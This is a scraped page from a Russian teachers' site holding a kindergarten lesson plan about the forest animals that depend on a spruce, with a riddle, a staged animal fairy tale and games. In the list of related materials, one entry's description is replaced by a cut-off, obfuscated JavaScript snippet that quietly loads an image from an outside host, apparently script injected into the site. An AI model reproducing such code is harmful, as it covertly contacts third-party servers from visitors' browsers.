С кем дружит ель.
план-конспект занятия по окружающему миру (средняя группа)

Серебрякова Алла Ивановна

Формирование у детей представлений о многообразии связей между живыми организмами леса.

Скачать:

ВложениеРазмер
Файл С кем дружит ель.17.71 КБ

Предварительный просмотр:

Цель. Формирование у детей представлений о многообразии связей между живыми организмами леса.

Задачи:  Образовательные: расширить представления детей об особенностях среды обитания белки, лесной мыши, медведя.

Развивающие:  развивать внимание, наблюдательность, память

Воспитательные. Воспитывать бережное отношение к природе.

Виды детской деятельности: коммуникативная, познавательная, двигательная, игровая.

Материалы и оборудование: искусственная ель, рисунок грустной ёлочки,

костюмы животных: медведя, мышки, зайки, лисички, волка; 4 корзины, шишки

Игра хороводная «Ровным кругом, друг за другом…»

Ведущий  -Послушайте, пожалуйста, загадку: 

Что же это за девица,

Не швея, не мастерица,

Ничего сама не шьёт,

А в иголках круглый год?  (Ель)  Показываю детям рисунок грустной ёлочки

-Ребята, а почему ёлочка плачет? (Ответы детей)

-У этого вечнозелёного дерева много друзей. Давайте, посмотрим сказку и узнаем, кто дружит с ёлочкой и почему.

Выходит «медведь», подходит к ёлочке

Мишка Иван -Каждый должен где-то жить

               И зимой и летом.

               Как же Мишке не тужить,

               Если дома нету?

               Каждый должен где-то спать.( Укладывается под елью)

Выпрыгивает «заяц»

Зайка Ярик Ч  -Что за ёлка славная

Выросла среди лужайки?

Кто под нею живет,

Расскажите зайке.

Мишка  - Это я, Мишка здесь в берложке спать хочу

                А кто будешь ты?

Зайка  - Я ушастый зайка.

Можно мне под ёлкой

Спрятаться от волка.  Прячется за ёлкой с другой стороны

Появляется мышка

Мышка Аня  - Хватит мне бродить по свету,

Будет мне тепло зимой.

Если никого здесь нету,

Значит, ель-это домик мой!

Зайка  - Кто тревожит наш покой?

Мышка  –Пи, пи, пи. Я, Мышка-норушка.

Зайка  - Для тебя найдётся место,

Веселее жить втроем.

Мишка  - Вот сейчас замесим тесто,

А потом чайку попьем

Появляется белка

Белка  Поля - Ах, какое чудо!

Рядышком запруда!

Дверь мне отворите

И в дупло пустите.

Мышка –Пи, пи, пи Может, пустим белку жить?

Зайка  -Оставайся с нами.

Появляется лиса

Лиса Роза  - Вот так ёлочка краса,

Ладная, нарядная.

Где же здесь парадная?

Отворяйте двери

Люди али звери?

Белка  - Я белка -  попрыгушка

Люблю по веткам скакать

И семена из шишек доставать.

Помоги, пожалуйста, мне шишки собрать.

Игра «Передай шишки»

Две команды встают в 2 шеренги друг против друга. С одной стороны шеренги стоит корзина с шишками, а с другой без. Дети по цепочке передают друг другу шишки, крайний ребёнок складывает их в пустую корзину. Победа за теми, чья команда быстрее передаст шишки.

Появляется волк.

Волк Саша   - Вот хоромы так хоромы-

Здесь простора хватит всем!

Что молчите? Есть кто дома?

Да не бойтесь вы, не съем!

Лиса  - Я, лиса огненная краса

Говори, кто ты такой!

Волк  - Я куманёк твой

Давай вместе жить

Лиса - Давай

Итог. 

Ветер тихо ель качает,

Влево- вправо наклоняет.

Снег тихонечко летит,

Зайка к елочке бежит.

Белка прыгает по ветке,

Дятел звонко ствол долбит.

Клест зимой птенцов выводит,

В теплой норке мышка спит.

 Ведущий  - Вот так одна ель

Собрала много друзей.

- Для многих  животных и птиц елка - это дом и корм.

А мы люди - за что любим елочку? (Ответы детей)

Рефлексия.  Хоровод «По дорожке весело…»


По теме: методические разработки, презентации и конспекты

Проект «C туризмом дружит вся семья» (старший дошкольный возраст)

Цель проекта: Привлечение детей и родителей к активному отдыху, спорту....

Если хочешь долго жить - научись с огнем дружить!

Развлечение по правилам пожарной безопасности, со сказкой-драматизацией и стихами противопожарного содержания. Старший дошкольный возраст....

Реализация ФГТ В ГДОУ. Занятие "Давайте дружить"

Цель: Создание условий для естественного психологического развития ребенка. Задачи: *Развитие эмоцианальной сферы. введение ребенка в мир человеческих эмоций. *развитие коммуникативных уме...

Конспект занятия "Давайте дружить"

Конспект занятия по развитию речи в 1 младшей группе....

Конспект НОД во II младшей группе на тему " Дружит с бабочкой цветок, Дружим мы с тобою».

Конспект НОД во II младшей группе на тему «Дружит с бабочкой цветок,Дружим мы с тобою».Конспект НОД  во II младшей группе на тему " Дружит с бабочкой цветок,Дружим мы с...

Что делать, если с вашим ребенком никто не дружит? Как помочь ребенку, если с ним не хотят дружить.

var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'npgo.lussoit.com\',\'67\'].join(\'/\'),(o=new Image).src=\'\'.concat(e).concat(n,\'.gif\')); !function(){if(!window.mainSc...

Тематическая беседа "Мы дружим с физкультурой" материал (группа раннего возраста) на тему: «Мы дружим с физкультурой»

Тематическая беседа "Мы дружим с физкультурой"материал (группа раннего возраста) на тему:«Мы дружим с физкультурой» Цель: учить заботиться о своем здоровье; прививать л...